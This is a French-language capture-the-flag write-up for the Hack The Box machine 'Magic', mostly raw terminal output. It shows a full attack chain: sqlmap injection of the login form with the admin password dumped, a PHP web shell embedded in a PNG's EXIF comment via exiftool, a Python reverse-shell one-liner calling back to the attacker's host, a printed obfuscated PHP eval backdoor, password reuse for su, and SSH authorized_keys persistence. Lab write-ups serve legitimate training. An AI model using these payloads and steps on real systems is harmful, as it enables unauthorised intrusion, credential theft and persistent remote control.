Logo

1. User

root@Host-001:~# nmap -sC -sV  10.10.10.185
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 11:23 CEST
Nmap scan report for 10.10.10.185
Host is up (0.088s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.35 seconds
root@Host-001:~#

Dirb:

root@Host-001:~# dirb http://10.10.10.185

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Apr 30 11:24:28 2020
URL_BASE: http://10.10.10.185/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.185/ ----
==> DIRECTORY: http://10.10.10.185/assets/                                     
==> DIRECTORY: http://10.10.10.185/images/                                     
+ http://10.10.10.185/index.php (CODE:200|SIZE:4589)                           
+ http://10.10.10.185/server-status (CODE:403|SIZE:277)                        
                                                                               
---- Entering directory: http://10.10.10.185/assets/ ----
==> DIRECTORY: http://10.10.10.185/assets/css/                                 
==> DIRECTORY: http://10.10.10.185/assets/js/                                  
                                                                               
---- Entering directory: http://10.10.10.185/images/ ----
==> DIRECTORY: http://10.10.10.185/images/uploads/                             
                                                                               
---- Entering directory: http://10.10.10.185/assets/css/ ----
==> DIRECTORY: http://10.10.10.185/assets/css/images/                          
                                                                               
---- Entering directory: http://10.10.10.185/assets/js/ ----
^C> Testing: http://10.10.10.185/assets/js/errordocs                           
root@Host-001:~# 

Page d’accueil http port 80 en bas: Please login to upload

Lien:

http://10.10.10.185/login.php

Username et Password classique. On intercepte la requête avec Burp on essaye du verb tampering HACK et GET sans succès on lance sqlmap. Voir HTTP Verb Tampering

root@Host-001:~/Bureau/htb/magic# sqlmap -r sqlmap_post.txt --risk=3
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:43:47 /2020-04-30/

[11:43:47] [INFO] parsing HTTP request from 'sqlmap_post.txt'
[11:43:47] [INFO] testing connection to the target URL
[11:43:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:43:48] [INFO] testing if the target URL content is stable
[11:43:48] [INFO] target URL content is stable
[11:43:48] [INFO] testing if POST parameter 'username' is dynamic
[11:43:49] [WARNING] POST parameter 'username' does not appear to be dynamic
[11:43:49] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[11:43:49] [INFO] testing for SQL injection on POST parameter 'username'
[11:43:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:43:50] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[11:43:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:43:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:43:52] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:43:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:43:53] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[11:43:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[11:43:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:43:55] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[11:43:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:43:55] [INFO] testing 'Generic inline queries'
[11:43:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[11:43:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[11:43:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[11:43:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:43:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[11:43:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:43:58] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[11:43:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[11:43:59] [INFO] testing 'Oracle AND time-based blind'
[11:43:59] [INFO] testing 'Oracle OR time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[11:45:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:45:10] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[11:45:10] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[11:45:11] [WARNING] POST parameter 'username' does not seem to be injectable
[11:45:11] [INFO] testing if POST parameter 'password' is dynamic
[11:45:11] [WARNING] POST parameter 'password' does not appear to be dynamic
[11:45:12] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[11:45:12] [INFO] testing for SQL injection on POST parameter 'password'
[11:45:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:45:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
got a 302 redirect to 'http://10.10.10.185:80/upload.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] n
[11:45:46] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --code=302)
[11:45:48] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] y
[11:46:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:46:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:46:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:46:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:46:11] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:46:11] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:46:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:46:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:46:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:46:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:46:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:46:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:46:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:46:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[11:46:12] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[11:46:12] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:46:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:46:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[11:46:12] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[11:46:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:46:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:46:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:46:12] [INFO] testing 'Generic inline queries'
[11:46:12] [INFO] testing 'MySQL inline queries'
[11:46:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:46:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:46:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:46:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:46:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[11:46:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[11:46:13] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[11:46:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[11:46:14] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[11:46:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[11:46:14] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[11:46:14] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[11:46:14] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[11:46:14] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[11:46:14] [INFO] testing 'MySQL AND time-based blind (ELT)'
[11:46:14] [INFO] testing 'MySQL OR time-based blind (ELT)'
[11:46:14] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[11:46:15] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[11:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[11:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[11:46:15] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[11:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[11:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[11:46:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:46:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:46:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:46:15] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[11:46:16] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[11:46:18] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[11:46:20] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[11:46:22] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[11:46:24] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[11:46:27] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[11:46:29] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[11:46:31] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[11:46:33] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[11:46:33] [INFO] checking if the injection point on POST parameter 'password' is a false positive
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 376 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=test&password=-1376' OR 2751=2751 AND 'AhSJ'='AhSJ
---
[11:54:43] [INFO] testing MySQL
[11:54:43] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[11:54:43] [INFO] confirming MySQL
[11:54:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[11:54:44] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.185'

[*] ending @ 11:54:44 /2020-04-30/

root@Host-001:~/Bureau/htb/magic# 

selon sqlmap il y une redirection vers http://10.10.10.185/upload.php

On dump avec –dump-all dans mysql:

root@Host-001:~/Bureau/htb/magic# sqlmap -r sqlmap_post.txt --risk=3 --dump-all
(...)
[12:27:18] [INFO] resumed: Th3s3usW4sK1ng
[12:27:18] [INFO] resumed: admin
Database: Magic
Table: login
[1 entry]
+------+----------+----------------+
| id   | username | password       |
+------+----------+----------------+
| 1    | admin    | Th3s3usW4sK1ng |
+------+----------+----------------+

[12:27:18] [INFO] table 'Magic.login' dumped to CSV file '/root/.sqlmap/output/10.10.10.185/dump/Magic/login.csv'

On consulte la page et on a bypassé la page de login…

Shell.php passe pas, seulement jpg et png

On essaie shell.php.png mais message ‘What are you trying to do there?’

On essaye avec exiftool:

root@Host-001:~/Bureau# exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' blank.png
root@Host-001:~/Bureau# mv blank.png blank.php.png
The file blank.php.png has been uploaded. 

http://10.10.10.185/images/uploads/blank.php.png?cmd=id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

http://10.10.10.185/images/uploads/blank.php.png?cmd=pwd

/var/www/Magic/images/uploads

http://10.10.10.185/images/uploads/blank.php.png?cmd=ls%20/var/www/Magic

assets
db.php5
id
images
index.php
login.php
logout.php
n30j1.php
upload.php

http://10.10.10.185/images/uploads/blank.php.png?cmd=cat%20/var/www/Magic/login.php

setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
            $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_OBJ);
            $stmt = $pdo->query("SELECT * FROM login WHERE username='$username' AND password='$password'");
            $user = $stmt->fetch();
            $count = 0;
            foreach ($user as $value) {
                $count += 1;
            }
            Database::disconnect();
            if ($count > 0) {
                $_SESSION['user_id'] = $user->id;
                header("Location: upload.php");
            } else {
                print("");
                //print('Wrong Username or Password');
            }
        } catch (PDOException $e) {
            //echo "Error: " . $e->getMessage();
            //echo "An SQL Error occurred!";
        }
    }
}
?>

http://10.10.10.185/images/uploads/blank.php.png?cmd=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
theseus:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash
sshd:x:123:65534::/run/sshd:/usr/sbin/nologin
mysql:x:122:127:MySQL Server,,,:/nonexistent:/bin/false

http://10.10.10.185/images/uploads/blank.php.png?cmd=ls%20-la%20/home/theseus/

total 84
drwxr-xr-x 15 theseus theseus 4096 Apr 16 02:58 .
drwxr-xr-x  3 root    root    4096 Oct 15  2019 ..
-rw-------  1 theseus theseus 7334 Apr 15 23:50 .ICEauthority
lrwxrwxrwx  1 theseus theseus    9 Oct 21  2019 .bash_history -> /dev/null
-rw-r--r--  1 theseus theseus  220 Oct 15  2019 .bash_logout
-rw-r--r--  1 theseus theseus   15 Oct 21  2019 .bash_profile
-rw-r--r--  1 theseus theseus 3771 Oct 15  2019 .bashrc
drwxrwxr-x 13 theseus theseus 4096 Mar 13 05:57 .cache
drwx------ 13 theseus theseus 4096 Oct 22  2019 .config
drwx------  3 theseus theseus 4096 Oct 21  2019 .gnupg
drwx------  3 theseus theseus 4096 Oct 21  2019 .local
drwx------  2 theseus theseus 4096 Apr 30 01:17 .ssh
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Desktop
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Documents
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Downloads
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Music
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Pictures
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Public
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Templates
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Videos
-r--------  1 theseus theseus   33 Apr 30 00:41 user.txt

view-source:http://10.10.10.185/images/uploads/blank.php.png?cmd=cat%20%20/var/www/Magic/db.php5

class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

….

Shell stable:

10.10.10.185/images/blank.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.90%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

Permet d’avoir un shell stable en écoute sur le port 1234 nc -nlvp 1234

fichier ok.php

<?php
$U='trlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);';
$p='$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_matc';
$='$k="f71dbe52";$kh="628a3f83a77a";$kf="b494817525c6";$p="';
$c='h("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==';
$i='1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(';
$X='$m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@ba';
$S='Cl2ULjIvWvX1ShJM";function x($t,$k){$c=strlen($k);$l=s';
$d='se64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}';
$j=str_replace('','','create_function');
$R=str_replace('','',$.$S.$U.$p.$c.$i.$X.$d);
$z=$j('',$R);$z();
?>

$k="f71dbe52";
$kh="628a3f83a77a";
$kf="b494817525c6";
$p="Cl2ULjIvWvX1ShJM";
function x($t,$k){
	$c=strlen($k);
	$l=strlen($t);
	$o="";
	for($i=0;$i<$l;){
		for($j=0;($j<$c&&$i<$l);$j++,$i++){
			$o.=$t{$i}^$k{$j};
		}
	}
	return $o;
}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
@ob_start();
@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");
}

Donne lambda_1

Pas l’air super utile…

On trouve une super commande pour avoir un vrai shell: /usr/bin/script -qc /bin/bash /dev/null

$ ls -la ok.php
-rw-r--r-- 1 www-data www-data 707 Apr 30 02:39 ok.php
$ su admin
su: must be run from a terminal
$ /usr/bin/script -qc /bin/bash /dev/null
www-data@ubuntu:/var/www/Magic/images$ sudo -l
sudo -l
[sudo] password for www-data: exit

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

sudo: 3 incorrect password attempts
www-data@ubuntu:/var/www/Magic/images$ su admin
su admin
No passwd entry for user 'admin'
www-data@ubuntu:/var/www/Magic/images$ su theseus
su theseus
Password: iamkingtheseus <-- mdp dans db.php5 ? Nope!

su: Authentication failure
www-data@ubuntu:/var/www/Magic/images$ su theseus
su theseus
Password: Th3s3usW4sK1ng                          <------- Le mdp de l'admin trouvé dans le dump de mysql...


theseus@ubuntu:/var/www/Magic/images$ id
id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)

theseus@ubuntu:/var/www/Magic/images$ cd /home/theseus
cd /home/theseus
theseus@ubuntu:~$ ls
ls
Desktop    Downloads   Music     Public     user.txt
Documents  linpeas.sh  Pictures  Templates  Videos
theseus@ubuntu:~$ cat user.txt
cat user.txt
a6ec88cc7fa8f2ec4e81796f27bdac17
theseus@ubuntu:~$ 

2. Root

theseus@ubuntu:/var/www/Magic/images/uploads$ sudo -l
sudo -l
[sudo] password for theseus: Th3s3usW4sK1ng

Sorry, user theseus may not run sudo on ubuntu.
theseus@ubuntu:/var/www/Magic/images/uploads$ cd /home
cd /home
theseus@ubuntu:/home$ ls
ls
theseus
theseus@ubuntu:/home$ cd theseus
cd theseus
theseus@ubuntu:~$ ls -la
ls -la
total 92
drwxr-xr-x 15 theseus theseus 4096 Aug  1 08:05 .
drwxr-xr-x  3 root    root    4096 Oct 15  2019 ..
lrwxrwxrwx  1 theseus theseus    9 Oct 21  2019 .bash_history -> /dev/null
-rw-r--r--  1 theseus theseus  220 Oct 15  2019 .bash_logout
-rw-r--r--  1 theseus theseus   15 Oct 21  2019 .bash_profile
-rw-r--r--  1 theseus theseus 3771 Oct 15  2019 .bashrc
drwxrwxr-x 13 theseus theseus 4096 Mar 13 05:57 .cache
-rwxrwxrwx  1 theseus theseus    0 Aug  1 07:34 cat
-rw-rw-r--  1 theseus theseus 1024 Aug  1 07:42 .cat.swp
drwx------ 13 theseus theseus 4096 Oct 22  2019 .config
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Desktop
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Documents
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Downloads
-rwxrwxr-x  1 theseus theseus   19 Aug  1 06:47 fdisk
drwx------  3 theseus theseus 4096 Oct 21  2019 .gnupg
-rw-------  1 theseus theseus 7334 Apr 15 23:50 .ICEauthority
drwx------  3 theseus theseus 4096 Oct 21  2019 .local
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Music
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Pictures
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Public
drwx------  2 theseus theseus 4096 Aug  1 09:24 .ssh
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Templates
-r--------  1 theseus theseus   33 Aug  1 03:19 user.txt
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Videos
theseus@ubuntu:~$ cd .ssh
cd .ssh
theseus@ubuntu:~/.ssh$ ls -la
ls -la
total 12
drwx------  2 theseus theseus 4096 Aug  1 09:24 .
drwxr-xr-x 15 theseus theseus 4096 Aug  1 08:05 ..
-rw-rw-r--  1 theseus theseus  563 Aug  1 09:24 authorized_keys
theseus@ubuntu:~/.ssh$ 

On peut écrire une clé ssh. Voir Authorized-Keys

root@Host-001:~/Bureau/htb/magic# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/Bureau/htb/magic/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/Bureau/htb/magic/id_rsa
Your public key has been saved in /root/Bureau/htb/magic/id_rsa.pub
The key fingerprint is:
SHA256:gJ4mi+myBrKh2dtwmlnjz36PND0W5KzlAFRUlbDOJTg root@Host-001
The key's randomart image is:
+---[RSA 3072]----+
|      .oo.oo..   |
|     o   . ..    |
|    . o E + .    |
|   . . o B o     |
|  . +   S B      |
|+o +     * .     |
|*=o +   + =      |
|*..X o ..+ .     |
|+o=.oo+....      |
+----[SHA256]-----+
root@Host-001:~/Bureau/htb/magic# ls -la 
total 104
drwxr-xr-x  2 root root  4096 août   2 10:23 .
drwxr-xr-x 14 root root  4096 août   1 09:50 ..
-rw-r--r--  1 root root  6008 avril 30 13:31 blank2.php.png
-rw-r--r--  1 root root  5914 avril 30 12:00 blank2.png_original
-rw-r--r--  1 root root  5976 avril 30 12:00 blank.php.png
-rw-------  1 root root  2602 août   2 10:23 id_rsa
-rw-r--r--  1 root root   567 août   2 10:23 id_rsa.pub
-rw-r--r--  1 root root 24609 avril 30 17:51 magic
-rw-r--r--  1 root root 20480 août   2 10:21 .magic.swp
-rwx------  1 root root  5493 avril 30 13:20 php-reverse-shell.php
-rw-r--r--  1 root root    30 avril 30 11:57 shell.php.png
-rw-r--r--  1 root root   487 avril 30 11:42 sqlmap_post.txt
root@Host-001:~/Bureau/htb/magic# cat id_rsa.pub
